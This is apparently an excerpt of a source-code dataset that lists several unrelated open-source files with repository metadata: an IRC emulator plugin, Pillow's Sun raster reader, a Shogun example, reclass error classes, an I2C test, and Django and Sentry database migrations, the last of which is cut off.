| -661,948,361,949,860,100
| 38.841837
| 85
| 0.548726
| false
| 4.585437
| false
| false
| false
|
on-three/asobot
|
asobot/emulator.py
|
1
|
1610
|
# vim: set ts=2 expandtab:
# -*- coding: utf-8 -*-
"""
Module: Emulator.py
Desc: pass keypresses to a game emultor or something.
Author: on_three
Email: on.three.email@gmail.com
DATE: Thursday, Jan 16th 2014
"""
import string
import re
from twisted.python import log
from controls import Key
class Emulator(object):
'''
pass commands to a game emulator of some sort.
'''
COMMAND_REGEX = ur'^(?P<command>:)(?P<commands>.+)$'
def __init__(self, parent, emulator_window_name):
'''
constructor
'''
self._parent = parent
self._window_name = emulator_window_name
def is_msg_of_interest(self, user, channel, msg):
'''
PLUGIN API REQUIRED
Is the rx'd irc message of interest to this plugin?
'''
m = re.match(Emulator.COMMAND_REGEX, msg)
if m:
log.msg('Message of interest...')
return True
else:
return False
def handle_msg(self, user, channel, msg):
'''
PLUGIN API REQUIRED
Handle message and return nothing
'''
log.msg('{channel} : {msg}'.format(channel=channel, msg=msg))
m = re.match(Emulator.COMMAND_REGEX, msg)
if not m:
return
#got a command along with the .c or .channel statement
commands = m.groupdict()['commands']
self.keypresses_to_emulator(commands, channel)
def keypresses_to_emulator(self, keys, channel):
'''
Split commands by spaces. Each non spaced group represents
a series of buttons (or joystick directions) pressed TOGETHER
'''
presses = [x.strip() for x in keys.split(u' ')]
for p in presses:
Key.press(p, self._window_name)
|
mit
| 2,284,341,602,436,959,700
| 23.769231
| 65
| 0.647205
| false
| 3.469828
| false
| false
| false
|
sserrot/champion_relationships
|
venv/Lib/site-packages/PIL/SunImagePlugin.py
|
1
|
4302
|
#
# The Python Imaging Library.
# $Id$
#
# Sun image file handling
#
# History:
# 1995-09-10 fl Created
# 1996-05-28 fl Fixed 32-bit alignment
# 1998-12-29 fl Import ImagePalette module
# 2001-12-18 fl Fixed palette loading (from Jean-Claude Rimbault)
#
# Copyright (c) 1997-2001 by Secret Labs AB
# Copyright (c) 1995-1996 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from . import Image, ImageFile, ImagePalette
from ._binary import i32be as i32
def _accept(prefix):
return len(prefix) >= 4 and i32(prefix) == 0x59A66A95
##
# Image plugin for Sun raster files.
class SunImageFile(ImageFile.ImageFile):
format = "SUN"
format_description = "Sun Raster File"
def _open(self):
# The Sun Raster file header is 32 bytes in length
# and has the following format:
# typedef struct _SunRaster
# {
# DWORD MagicNumber; /* Magic (identification) number */
# DWORD Width; /* Width of image in pixels */
# DWORD Height; /* Height of image in pixels */
# DWORD Depth; /* Number of bits per pixel */
# DWORD Length; /* Size of image data in bytes */
# DWORD Type; /* Type of raster file */
# DWORD ColorMapType; /* Type of color map */
# DWORD ColorMapLength; /* Size of the color map in bytes */
# } SUNRASTER;
# HEAD
s = self.fp.read(32)
if not _accept(s):
raise SyntaxError("not an SUN raster file")
offset = 32
self._size = i32(s[4:8]), i32(s[8:12])
depth = i32(s[12:16])
# data_length = i32(s[16:20]) # unreliable, ignore.
file_type = i32(s[20:24])
palette_type = i32(s[24:28]) # 0: None, 1: RGB, 2: Raw/arbitrary
palette_length = i32(s[28:32])
if depth == 1:
self.mode, rawmode = "1", "1;I"
elif depth == 4:
self.mode, rawmode = "L", "L;4"
elif depth == 8:
self.mode = rawmode = "L"
elif depth == 24:
if file_type == 3:
self.mode, rawmode = "RGB", "RGB"
else:
self.mode, rawmode = "RGB", "BGR"
elif depth == 32:
if file_type == 3:
self.mode, rawmode = "RGB", "RGBX"
else:
self.mode, rawmode = "RGB", "BGRX"
else:
raise SyntaxError("Unsupported Mode/Bit Depth")
if palette_length:
if palette_length > 1024:
raise SyntaxError("Unsupported Color Palette Length")
if palette_type != 1:
raise SyntaxError("Unsupported Palette Type")
offset = offset + palette_length
self.palette = ImagePalette.raw("RGB;L", self.fp.read(palette_length))
if self.mode == "L":
self.mode = "P"
rawmode = rawmode.replace("L", "P")
# 16 bit boundaries on stride
stride = ((self.size[0] * depth + 15) // 16) * 2
# file type: Type is the version (or flavor) of the bitmap
# file. The following values are typically found in the Type
# field:
# 0000h Old
# 0001h Standard
# 0002h Byte-encoded
# 0003h RGB format
# 0004h TIFF format
# 0005h IFF format
# FFFFh Experimental
# Old and standard are the same, except for the length tag.
# byte-encoded is run-length-encoded
# RGB looks similar to standard, but RGB byte order
# TIFF and IFF mean that they were converted from T/IFF
# Experimental means that it's something else.
# (https://www.fileformat.info/format/sunraster/egff.htm)
if file_type in (0, 1, 3, 4, 5):
self.tile = [("raw", (0, 0) + self.size, offset, (rawmode, stride))]
elif file_type == 2:
self.tile = [("sun_rle", (0, 0) + self.size, offset, rawmode)]
else:
raise SyntaxError("Unsupported Sun Raster file type")
#
# registry
Image.register_open(SunImageFile.format, SunImageFile, _accept)
Image.register_extension(SunImageFile.format, ".ras")
|
mit
| -6,823,107,286,268,212,000
| 30.632353
| 82
| 0.547652
| false
| 3.683219
| false
| false
| false
|
JingheZ/shogun
|
examples/undocumented/python_modular/structure_discrete_hmsvm_mosek.py
|
2
|
1217
|
#!/usr/bin/env python
import numpy
import scipy
from scipy import io
data_dict = scipy.io.loadmat('../data/hmsvm_data_large_integer.mat', struct_as_record=False)
parameter_list=[[data_dict]]
def structure_discrete_hmsvm_mosek (m_data_dict=data_dict):
from modshogun import RealMatrixFeatures
from modshogun import SequenceLabels, HMSVMModel, Sequence, TwoStateModel, SMT_TWO_STATE
from modshogun import StructuredAccuracy
try:
from modshogun import PrimalMosekSOSVM
except ImportError:
print("Mosek not available")
return
labels_array = m_data_dict['label'][0]
idxs = numpy.nonzero(labels_array == -1)
labels_array[idxs] = 0
labels = SequenceLabels(labels_array, 250, 500, 2)
features = RealMatrixFeatures(m_data_dict['signal'].astype(float), 250, 500)
num_obs = 4 # given by the data file used
model = HMSVMModel(features, labels, SMT_TWO_STATE, num_obs)
sosvm = PrimalMosekSOSVM(model, labels)
sosvm.train()
#print(sosvm.get_w())
predicted = sosvm.apply()
evaluator = StructuredAccuracy()
acc = evaluator.evaluate(predicted, labels)
#print('Accuracy = %.4f' % acc)
if __name__ == '__main__':
print("Discrete HMSVM Mosek")
structure_discrete_hmsvm_mosek(*parameter_list[0])
|
gpl-3.0
| 2,882,753,445,676,237,000
| 26.659091
| 92
| 0.733772
| false
| 2.83683
| false
| false
| false
|
madduck/reclass
|
reclass/errors.py
|
2
|
6324
|
#
# -*- coding: utf-8 -*-
#
# This file is part of reclass (http://github.com/madduck/reclass)
#
# Copyright © 2007–14 martin f. krafft <madduck@madduck.net>
# Released under the terms of the Artistic Licence 2.0
#
import posix, sys
import traceback
from reclass.defaults import PARAMETER_INTERPOLATION_SENTINELS
class ReclassException(Exception):
def __init__(self, rc=posix.EX_SOFTWARE, msg=None):
super(ReclassException, self).__init__()
self._rc = rc
self._msg = msg
self._traceback = traceback.format_exc()
message = property(lambda self: self._get_message())
rc = property(lambda self: self._rc)
def _get_message(self):
if self._msg:
return self._msg
else:
return 'No error message provided.'
def exit_with_message(self, out=sys.stderr):
print >>out, self.message
if self._traceback:
print >>out, self._traceback
sys.exit(self.rc)
class PermissionError(ReclassException):
def __init__(self, msg, rc=posix.EX_NOPERM):
super(PermissionError, self).__init__(rc=rc, msg=msg)
class InvocationError(ReclassException):
def __init__(self, msg, rc=posix.EX_USAGE):
super(InvocationError, self).__init__(rc=rc, msg=msg)
class ConfigError(ReclassException):
def __init__(self, msg, rc=posix.EX_CONFIG):
super(ConfigError, self).__init__(rc=rc, msg=msg)
class DuplicateUriError(ConfigError):
def __init__(self, nodes_uri, classes_uri):
super(DuplicateUriError, self).__init__(msg=None)
self._nodes_uri = nodes_uri
self._classes_uri = classes_uri
def _get_message(self):
return "The inventory URIs must not be the same " \
"for nodes and classes: {0}".format(self._nodes_uri)
class UriOverlapError(ConfigError):
def __init__(self, nodes_uri, classes_uri):
super(UriOverlapError, self).__init__(msg=None)
self._nodes_uri = nodes_uri
self._classes_uri = classes_uri
def _get_message(self):
msg = "The URIs for the nodes and classes inventories must not " \
"overlap, but {0} and {1} do."
return msg.format(self._nodes_uri, self._classes_uri)
class NotFoundError(ReclassException):
def __init__(self, msg, rc=posix.EX_IOERR):
super(NotFoundError, self).__init__(rc=rc, msg=msg)
class NodeNotFound(NotFoundError):
def __init__(self, storage, nodename, uri):
super(NodeNotFound, self).__init__(msg=None)
self._storage = storage
self._name = nodename
self._uri = uri
def _get_message(self):
msg = "Node '{0}' not found under {1}://{2}"
return msg.format(self._name, self._storage, self._uri)
class ClassNotFound(NotFoundError):
def __init__(self, storage, classname, uri, nodename=None):
super(ClassNotFound, self).__init__(msg=None)
self._storage = storage
self._name = classname
self._uri = uri
self._nodename = nodename
def _get_message(self):
if self._nodename:
msg = "Class '{0}' (in ancestry of node '{1}') not found " \
"under {2}://{3}"
else:
msg = "Class '{0}' not found under {2}://{3}"
return msg.format(self._name, self._nodename, self._storage, self._uri)
def set_nodename(self, nodename):
self._nodename = nodename
class InterpolationError(ReclassException):
def __init__(self, msg, rc=posix.EX_DATAERR):
super(InterpolationError, self).__init__(rc=rc, msg=msg)
class UndefinedVariableError(InterpolationError):
def __init__(self, var, context=None):
super(UndefinedVariableError, self).__init__(msg=None)
self._var = var
self._context = context
var = property(lambda self: self._var)
context = property(lambda self: self._context)
def _get_message(self):
msg = "Cannot resolve " + self._var.join(PARAMETER_INTERPOLATION_SENTINELS)
if self._context:
msg += ' in the context of %s' % self._context
return msg
def set_context(self, context):
self._context = context
class IncompleteInterpolationError(InterpolationError):
def __init__(self, string, end_sentinel):
super(IncompleteInterpolationError, self).__init__(msg=None)
self._ref = string.join(PARAMETER_INTERPOLATION_SENTINELS)
self._end_sentinel = end_sentinel
def _get_message(self):
msg = "Missing '{0}' to end reference: {1}"
return msg.format(self._end_sentinel, self._ref)
class InfiniteRecursionError(InterpolationError):
def __init__(self, path, ref):
super(InfiniteRecursionError, self).__init__(msg=None)
self._path = path
self._ref = ref.join(PARAMETER_INTERPOLATION_SENTINELS)
def _get_message(self):
msg = "Infinite recursion while resolving {0} at {1}"
return msg.format(self._ref, self._path)
class MappingError(ReclassException):
def __init__(self, msg, rc=posix.EX_DATAERR):
super(MappingError, self).__init__(rc=rc, msg=msg)
class MappingFormatError(MappingError):
def __init__(self, msg):
super(MappingFormatError, self).__init__(msg)
class NameError(ReclassException):
def __init__(self, msg, rc=posix.EX_DATAERR):
super(NameError, self).__init__(rc=rc, msg=msg)
class InvalidClassnameError(NameError):
def __init__(self, invalid_character, classname):
super(InvalidClassnameError, self).__init__(msg=None)
self._char = invalid_character
self._classname = classname
def _get_message(self):
msg = "Invalid character '{0}' in class name '{1}'."
return msg.format(self._char, self._classname)
class DuplicateNodeNameError(NameError):
def __init__(self, storage, name, uri1, uri2):
super(DuplicateNodeNameError, self).__init__(msg=None)
self._storage = storage
self._name = name
self._uris = (uri1, uri2)
def _get_message(self):
msg = "{0}: Definition of node '{1}' in '{2}' collides with " \
"definition in '{3}'. Nodes can only be defined once " \
"per inventory."
return msg.format(self._storage, self._name, self._uris[1], self._uris[0])
|
artistic-2.0
| 5,022,595,609,476,263,000
| 28.676056
| 83
| 0.621895
| false
| 3.668601
| false
| false
| false
|
stencila/hub
|
manager/users/migrations/0001_initial.py
|
1
|
5290
|
# Generated by Django 3.0.8 on 2020-07-08 22:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import users.models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Invite',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('key', models.CharField(default=users.models.generate_invite_key, help_text='The key for the invite.', max_length=64, unique=True)),
('email', models.EmailField(help_text='The email address of the person you are inviting.', max_length=2048)),
('message', models.TextField(blank=True, help_text='An optional message to send to the invitee.', null=True)),
('created', models.DateTimeField(auto_now_add=True, help_text='When the invite was created.')),
('sent', models.DateTimeField(blank=True, help_text='When the invite was sent.', null=True)),
('accepted', models.BooleanField(default=False, help_text='Whether the invite has been accepted. Will only be true if the user has clicked on the invitation AND authenticated.')),
('completed', models.DateTimeField(blank=True, help_text='When the invite action was completed', null=True)),
('action', models.CharField(blank=True, choices=[('join_account', 'Join account'), ('join_team', 'Join team'), ('join_project', 'Join project'), ('take_tour', 'Take tour')], help_text='The action to perform when the invitee signs up.', max_length=64, null=True)),
('subject_id', models.IntegerField(blank=True, help_text='The id of the target of the action.', null=True)),
('arguments', models.JSONField(blank=True, help_text='Any additional arguments to pass to the action.', null=True)),
('inviter', models.ForeignKey(blank=True, help_text='The user who created the invite.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invites', to=settings.AUTH_USER_MODEL)),
('subject_type', models.ForeignKey(blank=True, help_text='The type of the target of the action. e.g Team, Account', null=True, on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
],
),
migrations.CreateModel(
name='Flag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='The human/computer readable name.', max_length=100, unique=True, verbose_name='Name')),
('everyone', models.NullBooleanField(help_text='Flip this flag on (Yes) or off (No) for everyone, overriding all other settings. Leave as Unknown to use normally.', verbose_name='Everyone')),
('percent', models.DecimalField(blank=True, decimal_places=1, help_text='A number between 0.0 and 99.9 to indicate a percentage of users for whom this flag will be active.', max_digits=3, null=True, verbose_name='Percent')),
('testing', models.BooleanField(default=False, help_text='Allow this flag to be set for a session for user testing', verbose_name='Testing')),
('superusers', models.BooleanField(default=True, help_text='Flag always active for superusers?', verbose_name='Superusers')),
('staff', models.BooleanField(default=False, help_text='Flag always active for staff?', verbose_name='Staff')),
('authenticated', models.BooleanField(default=False, help_text='Flag always active for authenticated users?', verbose_name='Authenticated')),
('languages', models.TextField(blank=True, default='', help_text='Activate this flag for users with one of these languages (comma-separated list)', verbose_name='Languages')),
('rollout', models.BooleanField(default=False, help_text='Activate roll-out mode?', verbose_name='Rollout')),
('note', models.TextField(blank=True, help_text='Note where this Flag is used.', verbose_name='Note')),
('created', models.DateTimeField(db_index=True, default=django.utils.timezone.now, help_text='Date when this Flag was created.', verbose_name='Created')),
('modified', models.DateTimeField(default=django.utils.timezone.now, help_text='Date when this Flag was last modified.', verbose_name='Modified')),
('groups', models.ManyToManyField(blank=True, help_text='Activate this flag for these user groups.', to='auth.Group', verbose_name='Groups')),
('users', models.ManyToManyField(blank=True, help_text='Activate this flag for these users.', to=settings.AUTH_USER_MODEL, verbose_name='Users')),
],
options={
'verbose_name': 'Flag',
'verbose_name_plural': 'Flags',
'abstract': False,
},
),
]
|
apache-2.0
| 5,189,788,996,011,161,000
| 81.65625
| 279
| 0.652174
| false
| 4.242181
| false
| false
| false
|
Nic30/hwtLib
|
hwtLib/peripheral/i2c/masterBitCntrl_test.py
|
1
|
1862
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from _collections import deque
import unittest
from hwt.simulator.simTestCase import SimTestCase
from hwtLib.peripheral.i2c.intf import I2cAgent
from hwtLib.peripheral.i2c.masterBitCntrl import I2cMasterBitCtrl, \
NOP, START, READ, WRITE
from hwtSimApi.constants import CLK_PERIOD
from pyMathBitPrecise.bit_utils import get_bit
class I2CMasterBitCntrlTC(SimTestCase):
@classmethod
def setUpClass(cls):
cls.u = I2cMasterBitCtrl()
cls.compileSim(cls.u)
def test_nop(self):
u = self.u
u.cntrl._ag.data.append((NOP, 0))
u.clk_cnt_initVal._ag.data.append(4)
self.runSim(20 * CLK_PERIOD)
self.assertFalse(u.i2c._ag.hasTransactionPending())
def test_startbit(self):
u = self.u
u.cntrl._ag.data.extend([(START, 0), (NOP, 0)])
u.clk_cnt_initVal._ag.data.append(4)
self.runSim(60 * CLK_PERIOD)
self.assertEqual(u.i2c._ag.bit_cntrl_rx, deque([I2cAgent.START]))
def test_7bitAddr(self):
u = self.u
addr = 13
mode = I2cAgent.READ
u.cntrl._ag.data.extend(
[(START, 0), ] +
[(WRITE, get_bit(addr, 7 - i - 1)) for i in range(7)] +
[(WRITE, mode),
(READ, 0),
(NOP, 0)
])
u.clk_cnt_initVal._ag.data.append(4)
self.runSim(70 * CLK_PERIOD)
self.assertValSequenceEqual(
u.i2c._ag.bit_cntrl_rx,
[I2cAgent.START] +
[get_bit(addr, 7 - i - 1)
for i in range(7)] +
[mode])
if __name__ == "__main__":
suite = unittest.TestSuite()
# suite.addTest(I2CMasterBitCntrlTC('test_nop'))
suite.addTest(unittest.makeSuite(I2CMasterBitCntrlTC))
runner = unittest.TextTestRunner(verbosity=3)
runner.run(suite)
|
mit
| 4,142,820,898,430,028,300
| 27.646154
| 73
| 0.593985
| false
| 3.067545
| true
| false
| false
|
mvaled/sentry
|
src/sentry/south_migrations/0397_auto__add_latestrelease__add_unique_latestrelease_repository_id_enviro.py
|
1
|
102302
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
# Flag to indicate if this migration is too risky
# to run online and needs to be coordinated for offline
is_dangerous = False
def forwards(self, orm):
# Adding model 'LatestRelease'
db.create_table('sentry_latestrelease', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('repository_id', self.gf('sentry.db.models.fields.bounded.BoundedBigIntegerField')()),
('environment_id', self.gf('sentry.db.models.fields.bounded.BoundedBigIntegerField')()),
('release_id', self.gf('sentry.db.models.fields.bounded.BoundedBigIntegerField')()),
('deploy_id', self.gf('sentry.db.models.fields.bounded.BoundedBigIntegerField')(null=True)),
('commit_id', self.gf('sentry.db.models.fields.bounded.BoundedBigIntegerField')(null=True)),
))
db.send_create_signal('sentry', ['LatestRelease'])
# Adding unique constraint on 'LatestRelease', fields ['repository_id', 'environment_id']
db.create_unique('sentry_latestrelease', ['repository_id', 'environment_id'])
def backwards(self, orm):
# Removing unique constraint on 'LatestRelease', fields ['repository_id', 'environment_id']
db.delete_unique('sentry_latestrelease', ['repository_id', 'environment_id'])
# Deleting model 'LatestRelease'
db.delete_table('sentry_latestrelease')
models = {
'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.apiapplication': {
'Meta': {'object_name': 'ApiApplication'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'client_id': ('django.db.models.fields.CharField', [], {'default': "'77cf05ffe3c94e5d90e8d2debfdf44a3338317c84edf4a1584bccc7e741e5010'", 'unique': 'True', 'max_length': '64'}),
'client_secret': ('sentry.db.models.fields.encrypted.EncryptedTextField', [], {'default': "'5c21e34062d04fcdb2c6c95ae002e02493507d401a1d491c8c8272c07311e256'"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'homepage_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'Humble Sawfly'", 'max_length': '64', 'blank': 'True'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'privacy_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'redirect_uris': ('django.db.models.fields.TextField', [], {}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'terms_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'sentry.apiauthorization': {
'Meta': {'unique_together': "(('user', 'application'),)", 'object_name': 'ApiAuthorization'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': ('django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.apigrant': {
'Meta': {'object_name': 'ApiGrant'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']"}),
'code': ('django.db.models.fields.CharField', [], {'default': "'a510e2f87b39450998283c8fcb9a2925'", 'max_length': '64', 'db_index': 'True'}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2018, 3, 21, 0, 0)', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'redirect_uri': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': ('django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.apikey': {
'Meta': {'object_name': 'ApiKey'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'default': "'Default'", 'max_length': '64', 'blank': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Organization']"}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': ('django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.apitoken': {
'Meta': {'object_name': 'ApiToken'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2018, 4, 20, 0, 0)', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'refresh_token': ('django.db.models.fields.CharField', [], {'default': "'a3ad19998aaa4545964c0162fcd950e8b8f94f0d14dc4bfba4c173a03d2700d6'", 'max_length': '64', 'unique': 'True', 'null': 'True'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': ('django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'token': ('django.db.models.fields.CharField', [], {'default': "'035aa96ceba648c99324ae41a4a56d8b9c2ccc8c72314e4fb273262a30dee078'", 'unique': 'True', 'max_length': '64'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.assistantactivity': {
'Meta': {'unique_together': "(('user', 'guide_id'),)", 'object_name': 'AssistantActivity', 'db_table': "'sentry_assistant_activity'"},
'dismissed_ts': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'guide_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'useful': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'viewed_ts': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'sentry.auditlogentry': {
'Meta': {'object_name': 'AuditLogEntry'},
'actor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'audit_actors'", 'null': 'True', 'to': "orm['sentry.User']"}),
'actor_key': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiKey']", 'null': 'True', 'blank': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'target_object': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'target_user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'audit_targets'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.authenticator': {
'Meta': {'unique_together': "(('user', 'type'),)", 'object_name': 'Authenticator', 'db_table': "'auth_authenticator'"},
'config': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'last_used_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authidentity': {
'Meta': {'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))", 'object_name': 'AuthIdentity'},
'auth_provider': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.AuthProvider']"}),
'data': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'last_synced': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authprovider': {
'Meta': {'object_name': 'AuthProvider'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'default_role': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'default_teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'unique': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'sync_time': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.broadcast': {
'Meta': {'object_name': 'Broadcast'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_expires': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2018, 3, 28, 0, 0)', 'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'upstream_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'})
},
'sentry.broadcastseen': {
